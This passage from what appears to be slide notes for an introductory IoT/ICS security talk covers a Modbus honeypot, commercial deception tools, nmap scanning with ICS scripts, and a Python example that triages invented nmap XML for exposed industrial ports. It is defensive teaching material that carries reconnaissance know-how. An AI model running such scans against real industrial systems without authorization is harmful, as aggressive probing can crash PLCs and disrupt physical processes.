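            threading.Thread(target=client, args=(conn, addr), daemon=True).start()


if __name__ == "__main__":
    serve(port=5020)
```

Run it as a non-root user on port 5020 and point `nmap --script modbus-discover` at it to see the canned identity show up; the JSON log is what you would ship to the log management platform from the earlier slide. Keep the honeypot on its own public address with no NAT in front, as the setup slide advises, so the `peer` field records the real source.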
Honeypot results
• On a public server we saw dozens to sometimes hundreds of login attempts
• When default settings were changed and an environment was built (web sites), we saw targeted attacks
• Saw new code and zero-day attempts
Commercial Honeypots
• Fortinet – FortiDeceptor
• Attivo Networks – BOTsink
• Fidelis – Fidelis Deception
• TrapX – DeceptionGrid
• Illusive – Illusive Platform
Benefits of commercial tools
• Enterprise setup and support
• Customization services
• Updates and research available
• Integration into your environment
• Less chance of compromising your own network
• Normally better logging and alerting out of the box
Scanning for vulnerabilities
• Scan for open ports using nmap (Zenmap is the GUI)
• Scan for vulnerabilities using nmap scripts (NSE has ICS scripts such as modbus-discover and s7-info)
• Scan for vulnerabilities using vulnerability scanners
• Caution on ICS networks: aggressive scans have crashed PLCs; test on a lab copy first and rate-limit in production
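The scan itself is a one-liner; the work is triaging what came back. The following added example (not from the slides) parses nmap's XML output and flags open ports on well-known ICS protocols. The XML is a constructed stand-in for what `nmap -sV -p 102,502,20000,44818 -sU -p 47808 --script modbus-discover,s7-info -oX scan.xml <targets>` would write; the addresses, services and script output in it are invented, and the port-to-protocol table is an assumption for triage.

```python
"""Triage nmap XML output for exposed ICS services (added example).

The sample XML is constructed to look like nmap's -oX output after a scan
with the modbus-discover script; hosts, ports and script output are invented.
"""
import xml.etree.ElementTree as ET

# Well-known ICS/OT ports -> protocol (assumed triage table, TCP unless noted)
ICS_PORTS = {
    102: "Siemens S7comm (ISO-TSAP)",
    502: "Modbus/TCP",
    20000: "DNP3",
    44818: "EtherNet/IP (CIP)",
    47808: "BACnet/IP (UDP)",
}

SAMPLE_XML = """<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="502"><state state="open"/><service name="modbus"/>
        <script id="modbus-discover" output="sid 0x1: Slave ID data: Fake-PLC-2000 v1.0"/>
      </port>
      <port protocol="tcp" portid="102"><state state="closed"/><service name="iso-tsap"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="udp" portid="47808"><state state="open"/><service name="bacnet"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per open port: host, port, proto, service, product, scripts."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(filter(None, [svc.get("product"), svc.get("version")]))
            findings.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "product": product,
                "scripts": {s.get("id"): s.get("output") for s in port.findall("script")},
            })
    return findings


def ics_exposure(findings):
    """Keep only ports on known ICS protocols, labelled for the report."""
    return [dict(f, protocol_name=ICS_PORTS[f["port"]])
            for f in findings if f["port"] in ICS_PORTS]


def load_and_triage(path):
    """Read an nmap -oX file from disk and return the ICS findings."""
    with open(path, encoding="utf-8") as fh:
        return ics_exposure(parse_nmap_xml(fh.read()))


if __name__ == "__main__":
    for f in ics_exposure(parse_nmap_xml(SAMPLE_XML)):
        print(f["host"], f["port"], f["protocol_name"], f["scripts"])
```

Every hit from `ics_exposure` is worth a ticket on its own: with the Purdue model in mind, a Level 1 protocol answering on an address reachable by the scanner usually means a segmentation failure, whether or not a vulnerability scanner later finds a CVE for it.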
Vulnerability Scanner
• Looks at more than just open ports
• Scans for versions of applications and operating systems
• Compares those against known vulnerabilities and exploits
• OpenVAS shown (screenshot)
Part 4: Putting it all together
Introduction to IoT Infrastructure (15 minutes)
The Internet of Very Bad Things
• IoT and ICS devices have massive footprints
• They are being attacked continuously and create footholds (initial access) for attackers
• IoT and ICS attacks can cause disruption to governments
• Governments have created sophisticated attacks
• Devices on the Internet with open ports are indexed by Shodan
• Other devices can be scanned
What's next?
• The US Government has free training: https://ics-cert-training.inl.gov/learn
• Many classes are available from training organizations and free on YouTube
• Learn basic hardware hacking with Ubertooth One and HackRF One
• Learn about SDR (software defined radio); lots of free training on YouTube
PLC Hacking
• Velocio ACE PLC product
• http://velocio.net/ace/
• Great tool to learn basic point-and-click style PLC programming and hacking
• Lots of projects
Raspberry Pi Projects
• Biometric lock
• Noise detector
• Real-time movement device
• Air pollution meter
• Air traffic control relay
• Smart garage door opener
• Automated blinds
• Baggage tracker
Other resources (slide)
Thank You

Introduction to IoT Infrastructure

Aamir Lakhani
Twitter: @aamirlakhani
Email: aamir.Lakhani@me.com